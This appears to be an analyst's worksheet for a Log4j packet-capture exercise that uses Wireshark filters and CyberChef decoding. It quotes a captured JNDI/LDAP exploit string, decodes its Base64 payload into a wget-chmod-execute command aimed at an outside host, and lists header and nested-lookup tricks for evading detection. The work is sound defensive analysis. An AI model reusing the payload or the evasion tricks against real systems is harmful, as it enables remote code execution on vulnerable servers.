LOG4J ANALYSIS
Last updated
root@dco:~$ wireshark &
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng
#step 1: get an overview
WireShark
Filter: http.request.method == "POST" && http.user_agent contains "${jndi:"
* quote the contains operand; a bare $ is ambiguous with Wireshark's ${field} reference syntax
* the method clause only finds POSTs; to catch lookups sent in GET requests or in other headers (X-Api-Version, X-Forwarded-For, Referer, Authorization) widen the filter to: http contains "${jndi:"
* 444 3163.829852 45.137.21.9 198.71.247.91 HTTP 447 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} POST / HTTP/1.1
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
root@dco:~$ cyberchef.io
input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
recipe: From Base64
recipe: Defang IP Addresses
output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
* be aware that adversaries can set the User-Agent to a legitimate browser string and put the lookup in another header that the application logs (X-Api-Version, X-Forwarded-For, Referer, Authorization, etc.), or obfuscate the string itself with nested lookups such as ${${lower:j}ndi:...} so that a literal search for "${jndi:" misses it; filter on the whole HTTP layer rather than only user-agent, and resolve nested lookups before matching